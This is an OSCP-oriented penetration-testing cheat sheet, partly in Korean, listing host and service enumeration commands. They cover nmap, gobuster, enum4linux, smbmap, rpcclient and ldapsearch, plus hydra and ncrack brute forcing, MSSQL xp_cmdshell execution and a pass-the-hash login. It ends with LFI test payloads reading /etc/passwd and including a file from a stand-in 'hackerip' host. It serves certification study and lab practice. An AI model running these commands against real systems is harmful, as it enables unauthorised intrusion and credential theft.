Enumeration (정보 수집 및 열거)

All you need to know about basic host-based enumeration for OSCP

Network Discovery

Common Nmap Scan

nmap -sV -sT -sC -T5 -v -A $targetip

-sV (Version detection)
-sT (TCP connect scan)
-sC (Performs a script scan using the default set of scripts)
-T5 (Insane mode)
-v (Increase verbosity level)
-A (OS Detection)

All TCP port scan

nmap -p- -sT -v $targetip

All UDP Port Scan (With Service and Script Scan)

nmap -p- -sV -sU -sC $targetip

100 most common ports

nmap $targetip -F 100

Nmap Script Scan

Find the nse scripts

locate *.nse | grep <script.nse>

For example, the below command will find smb scripts.

locate *.nse | grep smb

Scan using a specific NSE script

nmap -sV -p 443 --script=ssl-heartbleed.nse $targetip

For example, below command will find any smb scripts running on port 139 & 445.

nmap -p 139,445 --script=smb-* $targetip

All smb scripts:

nmap --script smb-vuln* -p 139,445 [ip]

SMB share paths enumeration:

nmap --script smb-enum-shares -p 139,445 [ip]

Using Metasploit portscan

use auxiliary/scanner/portscan/

Service Discovery

Port 80 & 443 - Web Discovery

Find SSL Heartbleed Vulnerablity

sslscan $targetip:443

nmap -sV --script=ssl-heartbleed 192.168.101.8

Scan Web Servers

Nikto -h $targethost -p $targetport

Dictionary Attacks for finding hidden web objects

gobuster dir –url http://$targetip -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x aspx,php

You can also use the common web_content list.

/usr/share/seclists/Discovery/Web_Content/common.txt

For cgi-bin,

gobuster dir –url http://$targetip/cgi-bin/ -w /usr/share/seclists/Discovery/Web_Content/cgis.txt -x aspx,php

Or for faster scan

ffuf -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt -u 
http://$targetIP/FUZZ/something

ffuf Github link: https://github.com/ffuf/ffuf

Port 445 - SMB Discovery

To discover “All” of SMB

enum4linux -a $targetip

To discover the userlist

enum4linux -U $targetip

You can create a username list with awk.

cat user.txt | awk -F'[][]' '{print $2}' >> users.txt

enum4linux -s file

To find Password Policy

enum4linux -p $targetip

Alternative samba enumeration using smbmap

smbmap -H $targetip -d $domain -R

You can download file by smbmap directly from the victim host

smbmap -H 10.10.10.100 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18 --download "Users\SVC_TGS\Desktop\user.txt"

SMBCLIENT copying whole directory

mount -t cifs //IPADDESS/SHARE /mnt -o "user=SMBUSER,password=SMBPASS"

Check the list of shares via SMB null session

smbclient –list //$targetip/ -U ‘’ -N

smbclient \\$targetip\\$share

smbclient to list out share paths with sambaNTPasswrod

smbclient -U alice1978%0B186E661BBDBDCF6047784DE8B9FD8B --pw-nt-hash -L //ypuffy.htb/

Useful SMB commands

get $file to extract file to your host.
put $file to inject file to the victim.

Port 135 - RPC Discovery

rpcclient -U "" $targetip

Then use the below commands for more information

srvinfo
enumdomusers
getdompwinfo
querydominfo
netshareenum
netshareenumall

rpcbind -p 192.168.1.101

Port 389 & 636 for SSL - LDAP Discovery

ldapsearch -h 192.168.1.101 -p 389 -x -b "dc=mywebsite,dc=com"

or using nmap

nmap -p 389 --script ldap-search ypuffy.htb

Port 21 - FTP Discovery

ftp $targetip
nc $targetip 21

FTP Commands List: https://www.serv-u.com/features/file-transfer-protocol-server-linux/commands

Port 3306 - MySQL

mysql --host=$targetip -u root -p

telnet 192.168.0.101 3306

ERROR 1130 (HY000): Host '192.168.0.101' is not allowed to connect to this MySQL server means only localhost can log in as root.

MYSQL Commands List : http://cse.unl.edu/~sscott/ShowFiles/SQL/CheatSheet/SQLCheatSheet.html

SQL Password Storage

You can check the web server configuration php file if it contains any credentials.

/var/www/html/configuration.php

Port 3389 - RDP

RDP to Windows

rdesktop -u $username -p $password <IP>

Ruby winrm package from

GitHub - WinRb/WinRM: Ruby library for Windows Remote ManagementGitHub

gem install -r winrm
ruby winrm_shell.rb

Bruteforce RDP

ncrack -vv --user Administrator -P /root/passwords.txt rdp://192.168.1.101

Port 21 - FTP

ftp $targetip

nc $targetip 21

Port 22 - SSH

Information Gathering using nc

nc -nv  10.11.1.71 22

The target OS is "Ubuntu", using "OpenSSH v6.6" (and package is 2ubuntu2)

ssh -i id_rsa [email protected]

ssh-gen

/usr/bin/ssh-keygen -s /home/userca/ca -n 3m3rgencyB4ckd00r -I root .ssh/id_rsa

Bruteforce SSH Credential with hydra

hydra -l admin -P /usr/share/wordlists/rockyou.txt $ip ssh -t 5

Port 161 UDP - SNMP

snmpwalk -c public -v 1 10.10.10.116

To check if snmp port is opened

nc -nv -u -z -w 1 10.11.1.73 160-162

Port 88 - Kerberos

Bruteforce the username list with nmap script.

nmap -p88 --script=krb5-enum-users --script-args krb5-enum-users.realm='HTB',userdb=/root/oscp/forest/users.txt 10.10.10.161

Port 1433 -SQL

Command Injection using nmap

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=poiuytrewq,mssql.database=bankdb,ms-sql-xp-cmdshell.cmd="whoami" 10.11.1.31

Telnet - 25

telnet $targetip 25

Finding known exploits from Exploit-DB

To update to latest Exploit-DB

searchsploit -u

To find a exploit

searchsploit $item

To copy the file to your current directory.

searchsploit -m $item

To find item wihtout DOS attack

searchsploit apache 2.x | grep -v '/dos/'

Local File inclusions

Simple test if the target is vulnerable to LFI

http://target.com/?page=./../../../../../../../../../etc/passwd%00

Simple test if you can run a local script against the target

http://target.com/?page=http://hackerip/evil.txt%00

PreviousHost-based 공격 CheatSheet (FEAT. OSCP)NextExploitation (공격)

Last updated 2 years ago